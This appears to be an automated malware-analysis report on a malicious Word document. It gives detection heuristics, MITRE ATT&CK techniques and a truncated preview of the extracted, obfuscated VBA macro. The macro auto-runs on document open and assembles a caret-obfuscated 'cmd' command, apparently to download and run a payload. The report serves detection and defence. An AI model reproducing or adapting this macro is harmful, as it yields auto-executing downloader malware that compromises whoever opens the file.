MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains a VBA macro that automatically executes upon opening the document. This macro utilizes the Shell() function, a critical indicator of malicious activity, suggesting it's designed to download and execute a secondary payload. The presence of a Document_Open macro and the Shell() call strongly points towards a downloader or droppper functionality.
Heuristics 6
-
ClamAV: Doc.Malware.Valyria-6615927-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6615927-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 55570 bytes |
SHA-256: 9e8d13e667356730bc27d69eacf309f4408adeb6edda1109462f0fb21196aa8d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "QvbXRofjRVi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function GzbHXUji()
KIcoA = 41709 * PpbYa - EEGoPG * hBhqW + 47269 / SbzDa
zVFGZi = 65823 * IpKJSN - RWlrJp * bmRcE + 6412 / qXzrGE
hqcSk = 87601 * jNFDdJ - Rjatqt * pzZiJ + 34631 / MSLIF
EuzwY = 12233 * iMzKFX - FKdhva * EMzRij + 15886 / tXLBz
Emawz = 57557 * DfbLv - DORKGA * hEiOAj + 91897 / vOink
End Function
Function JEvVYhsAKI()
zSuDsX = hwiwB - wHvAP / 98849 + ZBMmr / (QLHCi + 63896)
lSRoL = 84422 * ATMRou - VzZwp * QwFHLZ + 12375 / ZvDRiS
dLDHUZ = 65560 * VDXDqH - hscopN * cllva + 45277 / zFbBj
thVqO = 10277 * ICDFST - ZGiXb * iRWZw + 20289 / VwvCKk
HTHBh = coCcqV - ujkMs / 7969 + whSuP / (SLcvaL + 77700)
OuRtTj = ktUCS - CMzRZv / 70485 + zwjbYU / (ShsHs + 37125)
End Function
Private Sub Document_open()
On Error Resume Next
aXCKL = MMSvL - 34484 / JKDVG - YsiXM - (oIPShi * 64598 / (25329 * nadjVA - 96478 * 34323 / 65624 / 94442 * zKNjV + zRAQs))
raBLsP = vblOs - 81277 / IlOlbY - DutEo - (lBWTQ * 73315 / (79333 * AmMGZ - 74954 * 55088 / 42794 / 88494 * CzRoJY + YBnofI))
qvojIPNfhqC = Application.Run("ZcUkmikAru", "" + WKwtkRiE + jZmkRaaAan + CVar("c") + uizJjQMivao + pBYzfuuprzvmNA + oRvkl + FkZPLKGrSt + WplfwoIrl + WVoLwL + TPQNMOmt + zVZrWjnPOzW + asHFA + NFiImMw + ptmtKz + izfqt + CcEMFYRb + paUviR + BHjDPqdf + knzVYcqVGVk + tpdOz + jzAOHboL + BEbsPz + iSHrOG + ZQCHXNaOin + AZiiSzCPa + WCONNRUT + XKDjEntJRWZ + jPfGjYlblB + duERzGBW + BiBlZjAMBpmwrw)
kBPVdE = NJiRc - 66567 / wvjKWz - POHiw - (OajCG * 50464 / (11494 * zGmVz - 53564 * 77675 / 53910 / 82586 * YiFqq + hcuVV))
qhznn = fLBcbw - 78768 / oZVhnX - FSAYjR - (ifkAM * 96727 / (92761 * znAwLE - 43998 * 2646 / 57750 / 84059 * VtCZn + PPkPzP))
End Sub
Function QZdHInoMcSz()
mKEuO = (6250 * ukmkfl * (uRNslQ * 74626 * 57025 * jOvmCJ + (aBcPZN * 95213 + FlwBU + aCHvGF)))
NwaEh = (96980 * FoSTSM * (IiiCrw * 78387 * 19940 * jUuNw + (LYCET * 79298 + vFUKht + BWUTM)))
LHzzLV = (5843 * NkiwF * (EBFnWW * 43931 * 13422 * BYGjkw + (XCoWJB * 18084 + wMTqm + nbmUMw)))
JOEOEw = (33157 * ZMMKN * (EtfHqT * 92451 * 95512 * BwqOnH + (UIJIJ * 64546 + IAQRY + NQzvqk)))
End Function
Function jWsamqzz()
ZlrYjM = VLUwV - 825 / abLQbF - ZwRbl - (GfiqUT * 58967 / (46298 * tbwYF - 33227 * 2114 / 53231 / 34012 * wWqiK + IOcAnZ))
iTiBw = jLjZiQ - 26432 / HLQCIR - OMMvMV - (luhFkB * 45193 / (74028 * vEnRz - 77188 * 70706 / 1222 / 59538 * QmMwQd + OQGWFk))
HTbWXi = NpZsH - 18069 / VoaWQS - NuODlS - (iWrrKT * 82729 / (19264 * AsAEC - 11062 * 67007 / 95426 / 1286 * AIUKfv + zuYNSm))
YDpjii = (4269 * TXijS * (AtYWA * 37018 * 74972 * PAUBL + (CXOTf * 7638 + BbUznG + DSwaWE)))
joMoiQ = jhvbb - 11631 / SwiLZw - wmAXA - (DELXt * 51953 / (85034 * tDbBw - 55967 * 68188 / 43836 / 31113 * FQvIqH + adJkBM))
End Function
Attribute VB_Name = "DRIcYfTQqkk"
Function oRvkl()
On Error Resume Next
zjKLuj = 80404 / pmBWIU - (AUuriV + nFAdQ)
wwvTfr = (vFlwt / CaLAFY + SZfuAT - tFKQQB - rpGDcd / FPJtpl)
aPVkOmCzqN = CStr(Chr(PAMUAcnhiFuq + mjwjMIUkFhu + 109 + wPmakmjK + QmCzTMpM)) + "d /" + CStr(Chr(cPRlbFMRivfZ + oSsiJDLWK + 99 + wJLBYPVAShj + ziZRfjc)) + " ^fOR" + " ; " + "/^f ," + " " + " " + "; " + CStr(Chr(kIBUKCrZGEpFi + QGfKZdk + 34 + rffduqiwoG + zDESIta)) + " toke" + "ns= 2"
AYrLPY = 33292 / SLuRp / 90301 - irnKk - wcuuN * VBLiv - 61208 / JsYqh - YFkQj / PUpLz - 95780 * coDvwQ
XnISTaVOKEL = " " + " de" + "li" + CStr(Chr(vUiYAYBS + zDhcfXNi + 109 + qQYXzRCarQ + aLwLwFuR)) + "s=" + "HYF"
kujZcw = 26032 / SnQsI / 75137 - OOrnci - witpz * DiVVQH - 61613 / HJIopS - ViAlvX / QpnwK - 43146 * BfmAiD
zHdzld = 71710 / JBGsMA / 23866 - Ldwpj - NkFDXF * cafDcF - 55355 / jfljNC - rzQorj / mDYPJu - 86677 * iGfija
ucAHp = 11799 / izmMR / 50994 - tECHl - fiSzJ * GdWnGO - 22711 / jXloi - LGoLw / Xwlhw - 53546 *
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.